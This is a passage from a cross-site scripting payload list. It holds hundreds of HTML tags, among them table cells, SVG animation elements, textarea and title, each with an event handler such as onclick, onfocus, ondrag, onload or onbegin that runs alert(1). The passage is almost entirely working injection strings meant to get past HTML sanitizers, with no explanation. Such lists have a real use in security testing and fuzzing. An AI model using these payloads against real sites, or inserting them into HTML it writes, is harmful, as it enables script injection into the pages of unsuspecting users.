oncopy="alert(1)" contenteditable>test</sub> <sub oncut="alert(1)" contenteditable>test</sub> <sub ondblclick="alert(1)">test</sub> <sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus> <sub onkeydown="alert(1)" contenteditable>test</sub> <sub onkeypress="alert(1)" contenteditable>test</sub> <sub onkeyup="alert(1)" contenteditable>test</sub> <sub onmousedown="alert(1)">test</sub> <sub onmouseenter="alert(1)">test</sub> <sub onmouseleave="alert(1)">test</sub> <sub onmousemove="alert(1)">test</sub> <sub onmouseout="alert(1)">test</sub> <sub onmouseover="alert(1)">test</sub> <sub onmouseup="alert(1)">test</sub> <sub onpaste="alert(1)" contenteditable>test</sub> <summary draggable="true" ondrag="alert(1)">test</summary> <summary draggable="true" ondragend="alert(1)">test</summary> <summary draggable="true" ondragenter="alert(1)">test</summary> <summary draggable="true" ondragleave="alert(1)">test</summary> <summary draggable="true" ondragstart="alert(1)">test</summary> <summary id=x tabindex=1 onactivate=alert(1)></summary> <summary id=x tabindex=1 onbeforeactivate=alert(1)></summary> <summary id=x tabindex=1 onbeforedeactivate=alert(1)></summary><input autofocus> <summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus> <summary id=x tabindex=1 onfocus=alert(1)></summary> <summary id=x tabindex=1 onfocusin=alert(1)></summary> <summary onbeforecopy="alert(1)" contenteditable>test</summary> <summary onbeforecut="alert(1)" contenteditable>test</summary> <summary onbeforepaste="alert(1)" contenteditable>test</summary> <summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus> <summary onclick="alert(1)">test</summary> <summary oncontextmenu="alert(1)">test</summary> <summary oncopy="alert(1)" contenteditable>test</summary> <summary oncut="alert(1)" contenteditable>test</summary> <summary ondblclick="alert(1)">test</summary> <summary onfocusout=alert(1) tabindex=1 id=x></summary><input autofocus> <summary onkeydown="alert(1)" contenteditable>test</summary> <summary onkeypress="alert(1)" contenteditable>test</summary> <summary onkeyup="alert(1)" contenteditable>test</summary> <summary onmousedown="alert(1)">test</summary> <summary onmouseenter="alert(1)">test</summary> <summary onmouseleave="alert(1)">test</summary> <summary onmousemove="alert(1)">test</summary> <summary onmouseout="alert(1)">test</summary> <summary onmouseover="alert(1)">test</summary> <summary onmouseup="alert(1)">test</summary> <summary onpaste="alert(1)" contenteditable>test</summary> <sup draggable="true" ondrag="alert(1)">test</sup> <sup draggable="true" ondragend="alert(1)">test</sup> <sup draggable="true" ondragenter="alert(1)">test</sup> <sup draggable="true" ondragleave="alert(1)">test</sup> <sup draggable="true" ondragstart="alert(1)">test</sup> <sup id=x tabindex=1 onactivate=alert(1)></sup> <sup id=x tabindex=1 onbeforeactivate=alert(1)></sup> <sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus> <sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus> <sup id=x tabindex=1 onfocus=alert(1)></sup> <sup id=x tabindex=1 onfocusin=alert(1)></sup> <sup onbeforecopy="alert(1)" contenteditable>test</sup> <sup onbeforecut="alert(1)" contenteditable>test</sup> <sup onbeforepaste="alert(1)" contenteditable>test</sup> <sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus> <sup onclick="alert(1)">test</sup> <sup oncontextmenu="alert(1)">test</sup> <sup oncopy="alert(1)" contenteditable>test</sup> <sup oncut="alert(1)" contenteditable>test</sup> <sup ondblclick="alert(1)">test</sup> <sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus> <sup onkeydown="alert(1)" contenteditable>test</sup> <sup onkeypress="alert(1)" contenteditable>test</sup> <sup onkeyup="alert(1)" contenteditable>test</sup> <sup onmousedown="alert(1)">test</sup> <sup onmouseenter="alert(1)">test</sup> <sup onmouseleave="alert(1)">test</sup> <sup onmousemove="alert(1)">test</sup> <sup onmouseout="alert(1)">test</sup> <sup onmouseover="alert(1)">test</sup> <sup onmouseup="alert(1)">test</sup> <sup onpaste="alert(1)" contenteditable>test</sup> <svg draggable="true" ondrag="alert(1)">test</svg> <svg draggable="true" ondragend="alert(1)">test</svg> <svg draggable="true" ondragenter="alert(1)">test</svg> <svg draggable="true" ondragleave="alert(1)">test</svg> <svg draggable="true" ondragstart="alert(1)">test</svg> <svg id=x onfocus=alert(1)> <svg id=x onfocusin=alert(1)> <svg id=x tabindex=1 onactivate=alert(1)></svg> <svg id=x tabindex=1 onbeforeactivate=alert(1)></svg> <svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus> <svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus> <svg onbeforecopy="alert(1)" contenteditable>test</svg> <svg onbeforecut="alert(1)" contenteditable>test</svg> <svg onbeforepaste="alert(1)" contenteditable>test</svg> <svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus> <svg onclick="alert(1)">test</svg> <svg oncontextmenu="alert(1)">test</svg> <svg oncopy="alert(1)" contenteditable>test</svg> <svg oncut="alert(1)" contenteditable>test</svg> <svg ondblclick="alert(1)">test</svg> <svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus> <svg onkeydown="alert(1)" contenteditable>test</svg> <svg onkeypress="alert(1)" contenteditable>test</svg> <svg onkeyup="alert(1)" contenteditable>test</svg> <svg onload=alert(1)> <svg onmousedown="alert(1)">test</svg> <svg onmouseenter="alert(1)">test</svg> <svg onmouseleave="alert(1)">test</svg> <svg onmousemove="alert(1)">test</svg> <svg onmouseout="alert(1)">test</svg> <svg onmouseover="alert(1)">test</svg> <svg onmouseup="alert(1)">test</svg> <svg onpaste="alert(1)" contenteditable>test</svg> <svg onunload=window.open('javascript:alert(1)')> <svg><a onload=alert(1)></a> <svg><abbr onload=alert(1)></abbr> <svg><acronym onload=alert(1)></acronym> <svg><address onload=alert(1)></address> <svg><animate onbegin=alert(1) attributeName=x dur=1s> <svg><animate onend=alert(1) attributeName=x dur=1s> <svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> <svg><animatetransform onbegin=alert(1) attributeName=transform> <svg><animatetransform onend=alert(1) attributeName=transform dur=1s> <svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s> <svg><applet onload=alert(1)></applet> <svg><area onload=alert(1)></area> <svg><article onload=alert(1)></article> <svg><aside onload=alert(1)></aside> <svg><audio onload=alert(1)></audio> <svg><b onload=alert(1)></b> <svg><base onload=alert(1)></base> <svg><basefont onload=alert(1)></basefont> <svg><bdi onload=alert(1)></bdi> <svg><bdo onload=alert(1)></bdo> <svg><bgsound onload=alert(1)></bgsound> <svg><big onload=alert(1)></big> <svg><blink onload=alert(1)></blink> <svg><blockquote onload=alert(1)></blockquote> <svg><br onload=alert(1)></br> <svg><button onload=alert(1)></button> <svg><canvas onload=alert(1)></canvas> <svg><caption onload=alert(1)></caption> <svg><center onload=alert(1)></center> <svg><cite onload=alert(1)></cite> <svg><code onload=alert(1)></code> <svg><col onload=alert(1)></col> <svg><colgroup onload=alert(1)></colgroup> <svg><command onload=alert(1)></command> <svg><content onload=alert(1)></content> <svg><data onload=alert(1)></data> <svg><datalist onload=alert(1)></datalist> <svg><dd onload=alert(1)></dd> <svg><del onload=alert(1)></del> <svg><details onload=alert(1)></details> <svg><dfn onload=alert(1)></dfn> <svg><dialog onload=alert(1)></dialog> <svg><dir onload=alert(1)></dir> <svg><discard onbegin=alert(1)> <svg><div onload=alert(1)></div> <svg><dl onload=alert(1)></dl> <svg><dt onload=alert(1)></dt> <svg><element onload=alert(1)></element> <svg><em onload=alert(1)></em> <svg><fieldset onload=alert(1)></fieldset> <svg><figcaption onload=alert(1)></figcaption> <svg><figure onload=alert(1)></figure> <svg><font onload=alert(1)></font> <svg><footer onload=alert(1)></footer> <svg><form onload=alert(1)></form> <svg><frameset onload=alert(1)></frameset> <svg><h1 onload=alert(1)></h1> <svg><head onload=alert(1)></head> <svg><header onload=alert(1)></header> <svg><hgroup onload=alert(1)></hgroup> <svg><hr onload=alert(1)></hr> <svg><html onload=alert(1)></html> <svg><i onload=alert(1)></i> <svg><image href=1 onerror=alert(1)> <svg><image href=validimage.png onload=alert(1)> <svg><ins onload=alert(1)></ins> <svg><kbd onload=alert(1)></kbd> <svg><keygen onload=alert(1)></keygen> <svg><label onload=alert(1)></label> <svg><legend onload=alert(1)></legend> <svg><li onload=alert(1)></li> <svg><listing onload=alert(1)></listing> <svg><main onload=alert(1)></main> <svg><map onload=alert(1)></map> <svg><mark onload=alert(1)></mark> <svg><marquee onload=alert(1)></marquee> <svg><menu onload=alert(1)></menu> <svg><menuitem onload=alert(1)></menuitem> <svg><meta onload=alert(1)></meta> <svg><meter onload=alert(1)></meter> <svg><multicol onload=alert(1)></multicol> <svg><nav onload=alert(1)></nav> <svg><nextid onload=alert(1)></nextid> <svg><nobr onload=alert(1)></nobr> <svg><noembed onload=alert(1)></noembed> <svg><noframes onload=alert(1)></noframes> <svg><noscript onload=alert(1)></noscript> <svg><ol onload=alert(1)></ol> <svg><optgroup onload=alert(1)></optgroup> <svg><option onload=alert(1)></option> <svg><output onload=alert(1)></output> <svg><p onload=alert(1)></p> <svg><param onload=alert(1)></param> <svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1"> <svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1> <svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"> <svg><picture onload=alert(1)></picture> <svg><plaintext onload=alert(1)></plaintext> <svg><pre onload=alert(1)></pre> <svg><progress onload=alert(1)></progress> <svg><q onload=alert(1)></q> <svg><rb onload=alert(1)></rb> <svg><rp onload=alert(1)></rp> <svg><rt onload=alert(1)></rt> <svg><rtc onload=alert(1)></rtc> <svg><ruby onload=alert(1)></ruby> <svg><s onload=alert(1)></s> <svg><samp onload=alert(1)></samp> <svg><section onload=alert(1)></section> <svg><select onload=alert(1)></select> <svg><set onbegin=alert(1) attributename=x dur=1s> <svg><set onend=alert(1) attributename=x dur=1s> <svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2> <svg><shadow onload=alert(1)></shadow> <svg><slot onload=alert(1)></slot> <svg><small onload=alert(1)></small> <svg><source onload=alert(1)></source> <svg><spacer onload=alert(1)></spacer> <svg><span onload=alert(1)></span> <svg><strike onload=alert(1)></strike> <svg><strong onload=alert(1)></strong> <svg><sub onload=alert(1)></sub> <svg><summary onload=alert(1)></summary> <svg><sup onload=alert(1)></sup> <svg><table onload=alert(1)></table> <svg><tbody onload=alert(1)></tbody> <svg><td onload=alert(1)></td> <svg><template onload=alert(1)></template> <svg><textarea onload=alert(1)></textarea> <svg><tfoot onload=alert(1)></tfoot> <svg><th onload=alert(1)></th> <svg><thead onload=alert(1)></thead> <svg><time onload=alert(1)></time> <svg><title onload=alert(1)></title> <svg><tr onload=alert(1)></tr> <svg><tt onload=alert(1)></tt> <svg><u onload=alert(1)></u> <svg><ul onload=alert(1)></ul> <svg><var onload=alert(1)></var> <svg><video onload=alert(1)></video> <svg><wbr onload=alert(1)></wbr> <svg><xmp onload=alert(1)></xmp> <svg><xss onload=alert(1)></xss> <table draggable="true" ondrag="alert(1)">test</table> <table draggable="true" ondragend="alert(1)">test</table> <table draggable="true" ondragenter="alert(1)">test</table> <table draggable="true" ondragleave="alert(1)">test</table> <table draggable="true" ondragstart="alert(1)">test</table> <table id=x tabindex=1 onactivate=alert(1)></table> <table id=x tabindex=1 onbeforeactivate=alert(1)></table> <table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus> <table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus> <table id=x tabindex=1 onfocus=alert(1)></table> <table id=x tabindex=1 onfocusin=alert(1)></table> <table onbeforecopy="alert(1)" contenteditable>test</table> <table onbeforecut="alert(1)" contenteditable>test</table> <table onbeforepaste="alert(1)" contenteditable>test</table> <table onblur=alert(1) tabindex=1 id=x></table><input autofocus> <table onclick="alert(1)">test</table> <table oncontextmenu="alert(1)">test</table> <table oncopy="alert(1)" contenteditable>test</table> <table oncut="alert(1)" contenteditable>test</table> <table ondblclick="alert(1)">test</table> <table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus> <table onkeydown="alert(1)" contenteditable>test</table> <table onkeypress="alert(1)" contenteditable>test</table> <table onkeyup="alert(1)" contenteditable>test</table> <table onmousedown="alert(1)">test</table> <table onmouseenter="alert(1)">test</table> <table onmouseleave="alert(1)">test</table> <table onmousemove="alert(1)">test</table> <table onmouseout="alert(1)">test</table> <table onmouseover="alert(1)">test</table> <table onmouseup="alert(1)">test</table> <table onpaste="alert(1)" contenteditable>test</table> <tbody draggable="true" ondrag="alert(1)">test</tbody> <tbody draggable="true" ondragend="alert(1)">test</tbody> <tbody draggable="true" ondragenter="alert(1)">test</tbody> <tbody draggable="true" ondragleave="alert(1)">test</tbody> <tbody draggable="true" ondragstart="alert(1)">test</tbody> <tbody id=x tabindex=1 onactivate=alert(1)></tbody> <tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody> <tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus> <tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus> <tbody id=x tabindex=1 onfocus=alert(1)></tbody> <tbody id=x tabindex=1 onfocusin=alert(1)></tbody> <tbody onbeforecopy="alert(1)" contenteditable>test</tbody> <tbody onbeforecut="alert(1)" contenteditable>test</tbody> <tbody onbeforepaste="alert(1)" contenteditable>test</tbody> <tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus> <tbody onclick="alert(1)">test</tbody> <tbody oncontextmenu="alert(1)">test</tbody> <tbody oncopy="alert(1)" contenteditable>test</tbody> <tbody oncut="alert(1)" contenteditable>test</tbody> <tbody ondblclick="alert(1)">test</tbody> <tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus> <tbody onkeydown="alert(1)" contenteditable>test</tbody> <tbody onkeypress="alert(1)" contenteditable>test</tbody> <tbody onkeyup="alert(1)" contenteditable>test</tbody> <tbody onmousedown="alert(1)">test</tbody> <tbody onmouseenter="alert(1)">test</tbody> <tbody onmouseleave="alert(1)">test</tbody> <tbody onmousemove="alert(1)">test</tbody> <tbody onmouseout="alert(1)">test</tbody> <tbody onmouseover="alert(1)">test</tbody> <tbody onmouseup="alert(1)">test</tbody> <tbody onpaste="alert(1)" contenteditable>test</tbody> <td draggable="true" ondrag="alert(1)">test</td> <td draggable="true" ondragend="alert(1)">test</td> <td draggable="true" ondragenter="alert(1)">test</td> <td draggable="true" ondragleave="alert(1)">test</td> <td draggable="true" ondragstart="alert(1)">test</td> <td id=x tabindex=1 onactivate=alert(1)></td> <td id=x tabindex=1 onbeforeactivate=alert(1)></td> <td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus> <td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus> <td id=x tabindex=1 onfocus=alert(1)></td> <td id=x tabindex=1 onfocusin=alert(1)></td> <td onbeforecopy="alert(1)" contenteditable>test</td> <td onbeforecut="alert(1)" contenteditable>test</td> <td onbeforepaste="alert(1)" contenteditable>test</td> <td onblur=alert(1) tabindex=1 id=x></td><input autofocus> <td onclick="alert(1)">test</td> <td oncontextmenu="alert(1)">test</td> <td oncopy="alert(1)" contenteditable>test</td> <td oncut="alert(1)" contenteditable>test</td> <td ondblclick="alert(1)">test</td> <td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus> <td onkeydown="alert(1)" contenteditable>test</td> <td onkeypress="alert(1)" contenteditable>test</td> <td onkeyup="alert(1)" contenteditable>test</td> <td onmousedown="alert(1)">test</td> <td onmouseenter="alert(1)">test</td> <td onmouseleave="alert(1)">test</td> <td onmousemove="alert(1)">test</td> <td onmouseout="alert(1)">test</td> <td onmouseover="alert(1)">test</td> <td onmouseup="alert(1)">test</td> <td onpaste="alert(1)" contenteditable>test</td> <template draggable="true" ondrag="alert(1)">test</template> <template draggable="true" ondragend="alert(1)">test</template> <template draggable="true" ondragenter="alert(1)">test</template> <template draggable="true" ondragleave="alert(1)">test</template> <template draggable="true" ondragstart="alert(1)">test</template> <template id=x tabindex=1 onactivate=alert(1)></template> <template id=x tabindex=1 onbeforeactivate=alert(1)></template> <template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus> <template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus> <template id=x tabindex=1 onfocus=alert(1)></template> <template id=x tabindex=1 onfocusin=alert(1)></template> <template onbeforecopy="alert(1)" contenteditable>test</template> <template onbeforecut="alert(1)" contenteditable>test</template> <template onbeforepaste="alert(1)" contenteditable>test</template> <template onblur=alert(1) tabindex=1 id=x></template><input autofocus> <template onclick="alert(1)">test</template> <template oncontextmenu="alert(1)">test</template> <template oncopy="alert(1)" contenteditable>test</template> <template oncut="alert(1)" contenteditable>test</template> <template ondblclick="alert(1)">test</template> <template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus> <template onkeydown="alert(1)" contenteditable>test</template> <template onkeypress="alert(1)" contenteditable>test</template> <template onkeyup="alert(1)" contenteditable>test</template> <template onmousedown="alert(1)">test</template> <template onmouseenter="alert(1)">test</template> <template onmouseleave="alert(1)">test</template> <template onmousemove="alert(1)">test</template> <template onmouseout="alert(1)">test</template> <template onmouseover="alert(1)">test</template> <template onmouseup="alert(1)">test</template> <template onpaste="alert(1)" contenteditable>test</template> <textarea autofocus onfocus=alert(1)>test</textarea> <textarea autofocus onfocusin=alert(1)>test</textarea> <textarea draggable="true" ondrag="alert(1)">test</textarea> <textarea draggable="true" ondragend="alert(1)">test</textarea> <textarea draggable="true" ondragenter="alert(1)">test</textarea> <textarea draggable="true" ondragleave="alert(1)">test</textarea> <textarea draggable="true" ondragstart="alert(1)">test</textarea> <textarea id=x tabindex=1 onactivate=alert(1)></textarea> <textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea> <textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus> <textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus> <textarea onauxclick=alert(1)>XSS</textarea> <textarea onbeforecopy=alert(1) autofocus>XSS</textarea> <textarea onbeforecut=alert(1) autofocus>XSS</textarea> <textarea onbeforepaste=alert(1) autofocus></textarea> <textarea onblur=alert(1) id=x></textarea><input autofocus> <textarea onchange=alert(1)>XSS</textarea> <textarea onclick="alert(1)">test</textarea> <textarea oncontextmenu="alert(1)">test</textarea> <textarea oncopy=alert(1) autofocus>XSS</textarea> <textarea oncut=alert(1) autofocus>XSS</textarea> <textarea ondblclick="alert(1)">test</textarea> <textarea onfocusout=alert(1) id=x></textarea><input autofocus> <textarea oninput=alert(1)>XSS</textarea> <textarea onkeydown="alert(1)" contenteditable>test</textarea> <textarea onkeypress="alert(1)" contenteditable>test</textarea> <textarea onkeyup="alert(1)" contenteditable>test</textarea> <textarea onmousedown="alert(1)">test</textarea> <textarea onmouseenter="alert(1)">test</textarea> <textarea onmouseleave="alert(1)">test</textarea> <textarea onmousemove="alert(1)">test</textarea> <textarea onmouseout="alert(1)">test</textarea> <textarea onmouseover="alert(1)">test</textarea> <textarea onmouseup="alert(1)">test</textarea> <textarea onpaste=alert(1) autofocus></textarea> <textarea onselect=alert(1) autofocus>XSS</textarea> <tfoot draggable="true" ondrag="alert(1)">test</tfoot> <tfoot draggable="true" ondragend="alert(1)">test</tfoot> <tfoot draggable="true" ondragenter="alert(1)">test</tfoot> <tfoot draggable="true" ondragleave="alert(1)">test</tfoot> <tfoot draggable="true" ondragstart="alert(1)">test</tfoot> <tfoot id=x tabindex=1 onactivate=alert(1)></tfoot> <tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot> <tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus> <tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus> <tfoot id=x tabindex=1 onfocus=alert(1)></tfoot> <tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot> <tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot> <tfoot onbeforecut="alert(1)" contenteditable>test</tfoot> <tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot> <tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus> <tfoot onclick="alert(1)">test</tfoot> <tfoot oncontextmenu="alert(1)">test</tfoot> <tfoot oncopy="alert(1)" contenteditable>test</tfoot> <tfoot oncut="alert(1)" contenteditable>test</tfoot> <tfoot ondblclick="alert(1)">test</tfoot> <tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> <tfoot onkeydown="alert(1)" contenteditable>test</tfoot> <tfoot onkeypress="alert(1)" contenteditable>test</tfoot> <tfoot onkeyup="alert(1)" contenteditable>test</tfoot> <tfoot onmousedown="alert(1)">test</tfoot> <tfoot onmouseenter="alert(1)">test</tfoot> <tfoot onmouseleave="alert(1)">test</tfoot> <tfoot onmousemove="alert(1)">test</tfoot> <tfoot onmouseout="alert(1)">test</tfoot> <tfoot onmouseover="alert(1)">test</tfoot> <tfoot onmouseup="alert(1)">test</tfoot> <tfoot onpaste="alert(1)" contenteditable>test</tfoot> <th draggable="true" ondrag="alert(1)">test</th> <th draggable="true" ondragend="alert(1)">test</th> <th draggable="true" ondragenter="alert(1)">test</th> <th draggable="true" ondragleave="alert(1)">test</th> <th draggable="true" ondragstart="alert(1)">test</th> <th id=x tabindex=1 onactivate=alert(1)></th> <th id=x tabindex=1 onbeforeactivate=alert(1)></th> <th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus> <th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus> <th id=x tabindex=1 onfocus=alert(1)></th> <th id=x tabindex=1 onfocusin=alert(1)></th> <th onbeforecopy="alert(1)" contenteditable>test</th> <th onbeforecut="alert(1)" contenteditable>test</th> <th onbeforepaste="alert(1)" contenteditable>test</th> <th onblur=alert(1) tabindex=1 id=x></th><input autofocus> <th onclick="alert(1)">test</th> <th oncontextmenu="alert(1)">test</th> <th oncopy="alert(1)" contenteditable>test</th> <th oncut="alert(1)" contenteditable>test</th> <th ondblclick="alert(1)">test</th> <th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus> <th onkeydown="alert(1)" contenteditable>test</th> <th onkeypress="alert(1)" contenteditable>test</th> <th onkeyup="alert(1)" contenteditable>test</th> <th onmousedown="alert(1)">test</th> <th onmouseenter="alert(1)">test</th> <th onmouseleave="alert(1)">test</th> <th onmousemove="alert(1)">test</th> <th onmouseout="alert(1)">test</th> <th onmouseover="alert(1)">test</th> <th onmouseup="alert(1)">test</th> <th onpaste="alert(1)" contenteditable>test</th> <thead draggable="true" ondrag="alert(1)">test</thead> <thead draggable="true" ondragend="alert(1)">test</thead> <thead draggable="true" ondragenter="alert(1)">test</thead> <thead draggable="true" ondragleave="alert(1)">test</thead> <thead draggable="true" ondragstart="alert(1)">test</thead> <thead id=x tabindex=1 onactivate=alert(1)></thead> <thead id=x tabindex=1 onbeforeactivate=alert(1)></thead> <thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus> <thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus> <thead id=x tabindex=1 onfocus=alert(1)></thead> <thead id=x tabindex=1 onfocusin=alert(1)></thead> <thead onbeforecopy="alert(1)" contenteditable>test</thead> <thead onbeforecut="alert(1)" contenteditable>test</thead> <thead onbeforepaste="alert(1)" contenteditable>test</thead> <thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus> <thead onclick="alert(1)">test</thead> <thead oncontextmenu="alert(1)">test</thead> <thead oncopy="alert(1)" contenteditable>test</thead> <thead oncut="alert(1)" contenteditable>test</thead> <thead ondblclick="alert(1)">test</thead> <thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus> <thead onkeydown="alert(1)" contenteditable>test</thead> <thead onkeypress="alert(1)" contenteditable>test</thead> <thead onkeyup="alert(1)" contenteditable>test</thead> <thead onmousedown="alert(1)">test</thead> <thead onmouseenter="alert(1)">test</thead> <thead onmouseleave="alert(1)">test</thead> <thead onmousemove="alert(1)">test</thead> <thead onmouseout="alert(1)">test</thead> <thead onmouseover="alert(1)">test</thead> <thead onmouseup="alert(1)">test</thead> <thead onpaste="alert(1)" contenteditable>test</thead> <time draggable="true" ondrag="alert(1)">test</time> <time draggable="true" ondragend="alert(1)">test</time> <time draggable="true" ondragenter="alert(1)">test</time> <time draggable="true" ondragleave="alert(1)">test</time> <time draggable="true" ondragstart="alert(1)">test</time> <time id=x tabindex=1 onactivate=alert(1)></time> <time id=x tabindex=1 onbeforeactivate=alert(1)></time> <time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus> <time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> <time id=x tabindex=1 onfocus=alert(1)></time> <time id=x tabindex=1 onfocusin=alert(1)></time> <time onbeforecopy="alert(1)" contenteditable>test</time> <time onbeforecut="alert(1)" contenteditable>test</time> <time onbeforepaste="alert(1)" contenteditable>test</time> <time onblur=alert(1) tabindex=1 id=x></time><input autofocus> <time onclick="alert(1)">test</time> <time oncontextmenu="alert(1)">test</time> <time oncopy="alert(1)" contenteditable>test</time> <time oncut="alert(1)" contenteditable>test</time> <time ondblclick="alert(1)">test</time> <time onfocusout=alert(1) tabindex=1 id=x></time><input autofocus> <time onkeydown="alert(1)" contenteditable>test</time> <time onkeypress="alert(1)" contenteditable>test</time> <time onkeyup="alert(1)" contenteditable>test</time> <time onmousedown="alert(1)">test</time> <time onmouseenter="alert(1)">test</time> <time onmouseleave="alert(1)">test</time> <time onmousemove="alert(1)">test</time> <time onmouseout="alert(1)">test</time> <time onmouseover="alert(1)">test</time> <time onmouseup="alert(1)">test</time> <time onpaste="alert(1)" contenteditable>test</time> <title draggable="true" ondrag="alert(1)">test</title> <title draggable="true" ondragend="alert(1)">test</title> <title draggable="true" ondragenter="alert(1)">test</title> <title draggable="true" ondragleave="alert(1)">test</title> <title draggable="true" ondragstart="alert(1)">test</title> <title id=x tabindex=1 onactivate=alert(1)></title> <title id=x tabindex=1 onbeforeactivate=alert(1)></title> <title id=x tabindex=1 onbeforedeactivate=alert(1)></title><input autofocus> <title id=x tabindex=1 ondeactivate=alert(1)></title><input id=y autofocus> <title id=x tabindex=1 onfocus=alert(1)></title> <title id=x tabindex=1 onfocusin=alert(1)></title> <title onbeforecopy="alert(1)" contenteditable>test</title> <title onbeforecut="alert(1)" contenteditable>test</title> <title onbeforepaste="alert(1)" contenteditable>test</title> <title onblur=alert(1) tabindex=1 id=x></title><input autofocus> <title onclick="alert(1)">test</title> <title oncontextmenu="alert(1)">test</title> <title oncopy="alert(1)" contenteditable>test</title> <title oncut="alert(1)" contenteditable>test</title> <title ondblclick="alert(1)">test</title> <title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus> <title onkeydown="alert(1)" contenteditable>test</title> <title onkeypress="alert(1)" contenteditable>test</title> <title onkeyup="alert(1)" contenteditable>test</title> <title onmousedown="alert(1)">test</title> <title onmouseenter="alert(1)">test</title> <title onmouseleave="alert(1)">test</title> <title onmousemove="alert(1)">test</title> <title onmouseout="alert(1)">test</title> <title onmouseover="alert(1)">test</title> <title onmouseup="alert(1)">test</title> <title onpaste="alert(1)" contenteditable>test</title> <tr draggable="true" ondrag="alert(1)">test</tr> <tr draggable="true" ondragend="alert(1)">test</tr> <tr draggable="true" ondragenter="alert(1)">test</tr> <tr draggable="true" ondragleave="alert(1)">test</tr> <tr draggable="true" ondragstart="alert(1)">test</tr> <tr id=x tabindex=1 onactivate=alert(1)></tr> <tr id=x tabindex=1 onbeforeactivate=alert(1)></tr> <tr id=x tabindex=1 onbeforedeactivate=alert(1)></tr><input autofocus> <tr id=x tabindex=1 ondeactivate=alert(1)></tr><input id=y autofocus> <tr id=x tabindex=1 onfocus=alert(1)></tr> <tr id=x tabindex=1 onfocusin=alert(1)></tr> <tr onbeforecopy="alert(1)" contenteditable>test</tr> <tr onbeforecut="alert(1)" contenteditable>test</tr> <tr onbeforepaste="alert(1)" contenteditable>test</tr> <tr onblur=alert(1) tabindex=1 id=x></tr><input autofocus> <tr onclick="alert(1)">test</tr> <tr oncontextmenu="alert(1)">test</tr> <tr oncopy="alert(1)" contenteditable>test</tr> <tr oncut="alert(1)" contenteditable>test</tr> <tr ondblclick="alert(1)">test</tr> <tr onfocusout=alert(1) tabindex=1 id=x></tr><input autofocus> <tr onkeydown="alert(1)" contenteditable>test</tr> <tr onkeypress="alert(1)" contenteditable>test</tr> <tr onkeyup="alert(1)" contenteditable>test</tr> <tr onmousedown="alert(1)">test</tr> <tr onmouseenter="alert(1)">test</tr> <tr onmouseleave="alert(1)">test</tr> <tr onmousemove="alert(1)">test</tr> <tr onmouseout="alert(1)">test</tr> <tr onmouseover="alert(1)">test</tr> <tr onmouseup="alert(1)">test</tr> <tr onpaste="alert(1)" contenteditable>test</tr> <track draggable="true" ondrag="alert(1)">test</track> <track draggable="true" ondragend="alert(1)">test</track> <track draggable="true" ondragenter="alert(1)">test</track> <track draggable="true" ondragleave="alert(1)">test</track> <track draggable="true" ondragstart="alert(1)">test</track> <track id=x tabindex=1 onactivate=alert(1)></track> <track id=x tabindex=1 onbeforeactivate=alert(1)></track> <track id=x tabindex=1 onbeforedeactivate=alert(1)></track><input autofocus> <track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus> <track id=x tabindex=1 onfocus=alert(1)></track> <track id=x tabindex=1 onfocusin=alert(1)></track> <track onbeforecopy="alert(1)" contenteditable>test</track> <track onbeforecut="alert(1)" contenteditable>test</track> <track onbeforepaste="alert(1)" contenteditable>test</track> <track onblur=alert(1) tabindex=1 id=x></track><input autofocus> <track onclick="alert(1)">test</track> <track oncontextmenu="alert(1)">test</track> <track oncopy="alert(1)" contenteditable>test</track> <track oncut="alert(1)" contenteditable>test</track> <track 